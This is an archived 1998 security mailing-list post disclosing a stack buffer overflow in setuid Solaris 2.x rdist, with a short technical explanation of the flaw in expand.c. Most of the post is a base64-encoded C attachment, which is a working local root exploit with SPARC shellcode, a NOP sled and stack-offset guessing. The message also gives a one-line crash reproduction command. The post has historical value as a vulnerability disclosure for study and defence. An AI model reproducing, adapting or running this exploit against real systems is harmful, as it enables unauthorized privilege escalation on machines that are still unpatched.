Date: Wed, 12 Aug 1998 20:20:03 -0400
From: John McDonald <[email protected]>
To: [email protected]Subject: solaris 2.x rdist exploit / too many humbles :p
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to [email protected] for more info.
--0-361180480-902967603=:2007
Content-Type: TEXT/PLAIN; charset=US-ASCII
Enclosed is an exploit for a hole in Solaris rdist that I believe the
patch #105667-01 addresses. That patch is for 2.6. I've personally tested
the exploit on 2.6, 2.5.1, and 2.5 machines. I'm not sure if that is the
right patch, but I'm pretty sure this hole has been fixed.
You can see the hole if you look at the bsd source for rdist, which is
apparantly pretty similiar to the code Sun used. The vulnerability is in
expand.c, which you can look at here:
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/rdist/expand.c?rev=1.5
Part of the program's functionality is to allow a user to define
variables and reference them in a way similiar to environment variables.
The problem comes in when the program attempts to substitute the symbol
representing the variable with it's value. You should be able to see this
by doing: rdist -d bleh=AAAAA(lotsa lotsa A's) -c /tmp/ '${bleh}'
In the function expstr(), we have
if (tp != NULL) {
for (; tp != NULL; tp = tp->n_next) {
(void) sprintf((char *)ebuf,
"%s%s%s", s, tp->n_name, tail);
expstr(ebuf);
}
return;
}
A little higher in the code, we see:
u_char ebuf[BUFSIZ];
This is obviously a bad thing. BTW, none of the bsds or linuxs are
vulnerable to any rdist hole to the best of my knowledge because the binary
isn't suid.
My nick used to be humble, but as of reading bugtraq yesterday, I can see
that someone else is partial to the name. In order to allieviate
confusion, (and to possibly deflect emails about how to "run
ufsrestore.c" to him :p), I'll change my nick. And looking at this last
post, I don't think I want to inherit his enemies. :>
horizon
--0-361180480-902967603=:2007
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="t4.c"
Content-Transfer-Encoding: BASE64
Content-ID: <[email protected]>
Content-Description:
LyogcmRpc3Qgc29sYXJpcyAyLiogc3Bsb2l0ICovDQovKiBieSBob3Jpem9u
LiB0aGFua3MgdG8ga3R3byAqLw0KLyogYXJndlsxXSBpcyB5b3VyIG9mZnNl
dCAqLw0KDQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDxzdGRsaWIu
aD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDx1bmlzdGQu
aD4NCg0KI2RlZmluZSBCVUZfTEVOR1RIIDEwMjQgDQojZGVmaW5lIFNBRkVU
WSA0MCAvKiBibGluZCBndWVzcyAqLw0KI2RlZmluZSBFWFRSQSA0MDANCiNk
ZWZpbmUgU1RBQ0tfT0ZGU0VUIDIzNjANCiNkZWZpbmUgU0FGRVRZX09GRlNF
VCAyNDgNCiNkZWZpbmUgU1BBUkNfTk9QIDB4YWMxNWExNmUNCg0KdV9jaGFy
IHNwYXJjX3NoZWxsY29kZVtdID0NCiJceDkwXHgwOFx4M2ZceGZmXHg4Mlx4
MTBceDIwXHg4ZFx4OTFceGQwXHgyMFx4MDgiDQoiXHg5MFx4MDhceDNmXHhm
Zlx4ODJceDEwXHgyMFx4MTdceDkxXHhkMFx4MjBceDA4Ig0KIlx4MmRceDBi
XHhkOFx4OWFceGFjXHgxNVx4YTFceDZlXHgyZlx4MGJceGRhXHhkY1x4YWVc
eDE1XHhlM1x4NjgiDQoiXHg5MFx4MGJceDgwXHgwZVx4OTJceDAzXHhhMFx4
MGNceDk0XHgxYVx4ODBceDBhXHg5Y1x4MDNceGEwXHgxNCINCiJceGVjXHgz
Ylx4YmZceGVjXHhjMFx4MjNceGJmXHhmNFx4ZGNceDIzXHhiZlx4ZjhceGMw
XHgyM1x4YmZceGZjIg0KIlx4ODJceDEwXHgyMFx4M2JceDkxXHhkMFx4MjBc
eDA4XHg5MFx4MWJceGMwXHgwZlx4ODJceDEwXHgyMFx4MDEiDQoiXHg5MVx4
ZDBceDIwXHgwOCI7DQoNCmludCBhZGRyX29rKGxvbmcgYSkNCnsNCglpZiAo
KChhPj4yNCkmMjU1KT09MCkgcmV0dXJuIDA7DQoJaWYgKCgoYT4+MTYpJjI1
NSk9PTApIHJldHVybiAwOw0KCWlmICgoKGE+PjgpJjI1NSk9PTApIHJldHVy
biAwOw0KCWlmICgoKGEpJjI1NSk9PTApIHJldHVybiAwOw0KCXJldHVybiAx
Ow0KfQ0KDQp1X2xvbmcgZ2V0X3NhZmVfYWRkcihsb25nIHNwKQ0Kew0KICAg
cmV0dXJuIHNwLVNBRkVUWV9PRkZTRVQ7DQp9DQoNCnVfbG9uZyBnZXRfc3Ao
dm9pZCkNCnsNCiAgIF9fYXNtX18oIm1vdiAlc3AsJWkwIFxuIik7DQp9DQoN
CmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogICBjaGFy
IGJ1ZltCVUZfTEVOR1RIICsgRVhUUkEgKyA4XTsNCiAgIGNoYXIgdGVtcGJ1
ZltCVUZfTEVOR1RIICsgRVhUUkEgKyA4KzZdOw0KDQogICBsb25nIHN0YWNr
LHRhcmdfYWRkcixzYWZlX2FkZHI7DQoNCiAgIHVfbG9uZyAqbG9uZ19wOw0K
ICAgdV9jaGFyICpjaGFyX3A7DQogICBpbnQgaSwgY29kZV9sZW5ndGggPSBz
dHJsZW4oc3BhcmNfc2hlbGxjb2RlKSxkc289MDsNCg0KICAgaWYoYXJnYyA+
IDEpIGRzbz1hdG9pKGFyZ3ZbMV0pOw0KDQogICBzdGFjaz1nZXRfc3AoKTsN
Cg0KICAgc2FmZV9hZGRyPWdldF9zYWZlX2FkZHIoc3RhY2spOw0KICAgd2hp
bGUoYWRkcl9vayhzYWZlX2FkZHIpPT0wKSBzYWZlX2FkZHIrPTg7DQoNCiAg
IHRhcmdfYWRkciA9IHN0YWNrICsgU1RBQ0tfT0ZGU0VUIC0gZHNvOw0KICAg
d2hpbGUoYWRkcl9vayh0YXJnX2FkZHIpPT0wKSB0YXJnX2FkZHIrPTg7DQoN
CiAgIGxvbmdfcCA9KHVfbG9uZyAqKSBidWYgOw0KICAgZm9yIChpID0gMDsg
aSA8IChCVUZfTEVOR1RIIC0gY29kZV9sZW5ndGgpIC8gc2l6ZW9mKHVfbG9u
Zyk7IGkrKykNCiAgICAgICpsb25nX3ArKyA9IFNQQVJDX05PUDsNCg0KICAg
Y2hhcl9wID0gKHVfY2hhciAqKSBsb25nX3A7DQoNCiAgIGZvciAoaSA9IDA7
IGkgPCBjb2RlX2xlbmd0aDsgaSsrKQ0KICAgICAgKmNoYXJfcCsrID0gc3Bh
cmNfc2hlbGxjb2RlW2ldOw0KDQogICAqY2hhcl9wKys9JyAnOw0KICAgKmNo
YXJfcCsrPScgJzsNCgkNCiAgIGZvciAoaSA9IDA7IGkgPCBTQUZFVFkgLzQ7
IGkrKykNCiAgIHsNCiAgICAgICpjaGFyX3ArKyA9KHNhZmVfYWRkcj4+MjQp
JjI1NTsNCiAgICAgICpjaGFyX3ArKyA9KHNhZmVfYWRkcj4+MTYpJjI1NTsN
CiAgICAgICpjaGFyX3ArKyA9KHNhZmVfYWRkcj4+OCkmMjU1Ow0KICAgICAg
KmNoYXJfcCsrID0oc2FmZV9hZGRyKSYyNTU7DQogICAgfQ0KDQogICBmb3Ig
KGkgPSAwOyBpIDwgKEVYVFJBLVNBRkVUWSkgLzQ7IGkrKykNCiAgIHsNCiAg
ICAgICpjaGFyX3ArKyA9KHRhcmdfYWRkcj4+MjQpJjI1NTsNCiAgICAgICpj
aGFyX3ArKyA9KHRhcmdfYWRkcj4+MTYpJjI1NTsNCiAgICAgICpjaGFyX3Ar
KyA9KHRhcmdfYWRkcj4+OCkmMjU1Ow0KICAgICAgKmNoYXJfcCsrID0odGFy
Z19hZGRyKSYyNTU7DQogICB9DQoNCiAgICpjaGFyX3ArKz0wOw0KDQogICBz
cHJpbnRmKHRlbXBidWYsImJsZWg9JXMiLCZidWZbMl0pOw0KDQogICBwcmlu
dGYoIlN0YWNrIGFkZHJlc3M6IDB4JWx4LiBTYWZlIGFkZHJlc3M6IDB4JWx4
IChkZWx0YSAlZCkuXG4iLA0KICAgICAgc3RhY2ssc2FmZV9hZGRyLHN0YWNr
LXNhZmVfYWRkcik7DQogICBwcmludGYoIkp1bXBpbmcgdG8gYWRkcmVzcyAw
eCVseCBCWyVkXSBFWyVkXSBTT1slZF1cbiIsDQogICAgICB0YXJnX2FkZHIs
QlVGX0xFTkdUSCxFWFRSQSxTVEFDS19PRkZTRVQpOw0KICAgZXhlY2woIi9i
aW4vcmRpc3QiLCJyZGlzdCIsIi1kIix0ZW1wYnVmLCItYyIsIi90bXAvIiwi
JHtibGVofSIsKGNoYXIgKikgMCk7DQogICBwZXJyb3IoImV4ZWNsIGZhaWxl
ZCIpOw0KfQ0K
--0-361180480-902967603=:2007--